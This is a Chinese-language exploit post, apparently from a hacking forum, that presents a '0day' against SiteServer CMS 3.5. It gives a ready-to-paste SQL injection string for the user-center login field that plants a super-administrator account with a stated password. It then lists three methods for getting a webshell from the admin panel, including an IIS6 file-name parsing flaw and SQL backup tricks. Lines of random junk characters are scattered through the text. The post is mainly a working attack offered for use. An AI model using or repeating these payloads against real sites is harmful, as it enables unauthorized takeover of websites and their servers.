SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
" h& v7 Y% B# k; @9 l; f, x
stieserver官网:www.siteserver.cn


! d& F4 T. V* w2 l$ P" D
EXP:

1 r: u7 e& M! b直接访问UserCenter/login.aspx
! d+ I: ?7 q* i
3 W6 [) [! W. ^; m9 ?( @+ z
8 N5 D7 m5 l1 l. |
' ~2 |8 x6 t, t3 X用户名处输入：
4 f- P" A! l. t# K+ _+ h
" R  r7 x9 ?) \( @- B123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

3 k7 y  s# y/ D4 j) {( _. y

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

4 A8 E( l: o. O! w9 ^! _
! P; m" I2 w. O, O5 t& Z
: Q( k$ j: }3 e( _% o之后再访问后台SiteServer/login.aspx用插入的用户登陆
( z5 ?8 X4 i) Z- T
/ A: }7 Q# [$ K, z+ d5 {

' f2 [8 x5 {' [& J8 \3 {后台拿webshell的三种方法：

& @# u, E1 J; @6 ~/ H# C) Y一、
. R3 U  R4 i7 J+ {5 o7 R. q) K
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

3 M7 R0 k% _: m. |7 A二、
# o% E' ~  a! B5 m* |
- Z3 B/ g3 c% v! r0 B成员权限-》添加用户-》用户名为：1.asp
' `$ m+ F( |; I( ~
http://127.0.0.1/usercenter/

- t0 |9 w9 r! c- y% P/ m1 R用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
8 o+ d( o+ Q% H! D" W4 ], {
三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
( u. Y" W0 b" C$ y- x: n" d这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

; M( y; o- s# K' C/ A